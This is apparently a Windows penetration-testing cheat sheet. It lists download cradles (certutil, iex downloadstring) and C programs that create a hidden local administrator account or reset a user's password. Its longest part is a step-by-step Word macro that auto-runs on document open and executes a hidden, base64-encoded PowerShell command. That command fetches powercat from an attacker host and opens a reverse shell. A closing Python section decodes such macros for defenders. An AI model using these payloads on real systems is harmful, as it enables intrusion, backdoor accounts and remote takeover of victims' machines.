
Miscellaneous

A collection of nifty tricks and hacks to make your Windows pentesting smarter, faster, and stealthier.


Downloading files onto a Windows machine

Method 1

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/exploit.exe', 'c:\Users\Public\Downloads\exploit.exe')"

Method 2

certutil -urlcache -split -f http://192.168.1.1/exploit.exe

Method 3

iwr -uri http://192.168.1.1/Powerview.ps1 -Outfile PowerView.ps1

Method 4

iex(new-object net.webclient).downloadstring('http://192.168.1.1/Invoke-ADEnum.ps1')

Method 5

Use impacket-smbserver on the Kali machine to share a directory over SMB:

impacket-smbserver -smb2support smb tools/

Then pull the file onto the Windows machine with the copy command:

copy \\192.168.1.1\smb\PowerView.ps1

Downloading files from Windows to the Kali machine

Method 1

Start the SSH service on the Kali machine with the command below:

sudo service ssh start

Then run the command below on the Windows machine to push the file to Kali:

scp "C:\path\to\local\file.txt" kali@<Kali_IP_Address>:/home/kali/destination/directory/

Cross-compiling code on Kali

The command below builds a Windows .exe from C source on Kali; the resulting file can then be pushed to the Windows machine and executed there:

i686-w64-mingw32-gcc program.c -o exploit.exe

C programs to perform actions on Windows

Prog 1: Add a user on the Windows machine

This program adds the user pawan with the password 123! and puts that user into the local Administrators group.

#include <stdlib.h>

int main(void)
{
    int rc;

    /* Create the local user pawan with password 123! */
    rc = system("net user pawan 123! /add");
    if (rc != 0)
        return 1;

    /* Add the new user to the local Administrators group */
    rc = system("net localgroup administrators pawan /add");

    return rc == 0 ? 0 : 1;
}

Prog 2: Change a user's password

This program changes the password of the user Pawan to NewPassword456!.

#include <stdlib.h>

int main(void)
{
    int rc;

    /* Set a new password for the existing local user Pawan */
    rc = system("net user Pawan NewPassword456!");

    return rc == 0 ? 0 : 1;
}
Tip: The programs above can be used for service binary hijacking, DLL hijacking, unquoted service paths, etc., and can be cross-compiled into an .exe with the command given in this section.


Get a reverse shell from a macro

You can download the Python script RevShellMacro.py to do the work: just enter the IP address and port. By default it uses HTTP port 80 to download powercat from the Kali machine.

Below is the detailed manual method, in case you want to do the work by hand.

Step 1. Build the powercat reverse shell command

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell

This command downloads powercat.ps1 from your Kali machine and runs it to open a reverse shell back to port 4444.

Step 2. Base64 encode your command

pwsh
$Text="IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.230/powercat.ps1');powercat -c 192.168.45.230 -p 4444 -e powershell"
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText
SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADEAOQAyAC8AcABvAHcAZQByAGMAYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADEAOQAyACAALQBwACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwA

Step 3. Split the command into chunks using python3

VBA limits the length of a single line of code, so the long command has to be built up from shorter string concatenations. Assign the command to a variable:

>>> my_str = "powershell.exe -nop -w hidden -enc <base64_encoded_command>"

Decide on the chunk size and run the split:

>>> n = 50
>>> [print('Str = Str + "' + my_str[i:i+n] + '"') for i in range(0, len(my_str), n)]

Below is the output of the commands above:

└─$ python3                                                                 
Python 3.13.3 (main, Apr 10 2025, 21:38:51) [GCC 14.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> my_str = "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAb\
gB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMwAwAC8AcABvAHcAZQByAGMAYQB0AC4AcAB\
zADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMwAwACAALQBwACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsA\
GwA"
>>> n = 50
>>> [print('Str = Str + "' + my_str[i:i+n] + '"') for i in range(0, len(my_str), n)]
...
Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
Str = Str + "hAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5A"
Str = Str + "DIALgAxADYAOAAuADQANQAuADIAMwAwAC8AcABvAHcAZQByAGM"
Str = Str + "AYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAAL"
Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMwAwACAALQB"
Str = Str + "wACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsA"
Str = Str + "GwA"

Step 4. Put everything together in the macro

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String

    Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
    Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
    Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
    Str = Str + "hAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5A"
    Str = Str + "DIALgAxADYAOAAuADQANQAuADEAOQAyAC8AcABvAHcAZQByAGM"
    Str = Str + "AYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAAL"
    Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADEAOQAyACAALQB"
    Str = Str + "wACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsA"
    Str = Str + "GwA"

    CreateObject("Wscript.Shell").Run Str
End Sub
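On the defender's side, triaging a document with a macro of this shape means running Steps 2 to 4 in reverse: reassemble the chunked string, pull out the -enc argument, undo the base64 and UTF-16LE encoding, and flag download-cradle indicators in the result. The Python below is an added example, not part of the original page or of RevShellMacro.py; it takes the macro from Step 4 as its constructed input, and the indicator list and function names are choices made here.

```python
import base64
import re

# Constructed sample: the macro body from Step 4 above, as an analyst would see
# it after extracting the VBA from a suspicious document (e.g. with olevba).
SAMPLE_MACRO = """Sub MyMacro()
Dim Str As String
Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
Str = Str + "hAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5A"
Str = Str + "DIALgAxADYAOAAuADQANQAuADEAOQAyAC8AcABvAHcAZQByAGM"
Str = Str + "AYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAAL"
Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADEAOQAyACAALQB"
Str = Str + "wACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsA"
Str = Str + "GwA"
CreateObject("Wscript.Shell").Run Str
End Sub"""

# One chunk line of the form  Var = Var + "..."  (also accepts & or a plain Var = "...")
_CHUNK = re.compile(r'^\s*(\w+)\s*=\s*(?:\1\s*[+&]\s*)?"([^"]*)"\s*$', re.M)
# powershell.exe accepts -e, -ec, -enc and -encodedcommand for the encoded form
_ENC = re.compile(r'-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)', re.I)
# Strings worth flagging in either the raw command line or its decoded payload
INDICATORS = ("IEX", "Invoke-Expression", "WebClient", "DownloadString",
              "DownloadFile", "powercat", "-nop", "-w hidden")

def reassemble(macro_text):
    """Join the chunked string pieces back into the single command the macro runs."""
    return "".join(m.group(2) for m in _CHUNK.finditer(macro_text))

def decode_encoded_command(cmdline):
    """Recover the plaintext of a -enc payload: base64 over UTF-16LE (Step 2)."""
    m = _ENC.search(cmdline)
    if not m:
        return None
    b64 = m.group(1) + "=" * (-len(m.group(1)) % 4)   # restore stripped padding
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # not base64 / not UTF-16LE text
        return None

def analyse_macro(macro_text):
    """Reassemble, decode and flag indicators; returns a small triage record."""
    cmdline = reassemble(macro_text)
    decoded = decode_encoded_command(cmdline)
    haystack = (cmdline + " " + (decoded or "")).lower()
    hits = [i for i in INDICATORS if i.lower() in haystack]
    return {"cmdline": cmdline, "decoded": decoded, "indicators": hits}
```

analyse_macro(SAMPLE_MACRO) returns the reassembled command line, the decoded download cradle and the matched indicators; decode_encoded_command also works directly on a command line taken from a process-creation event.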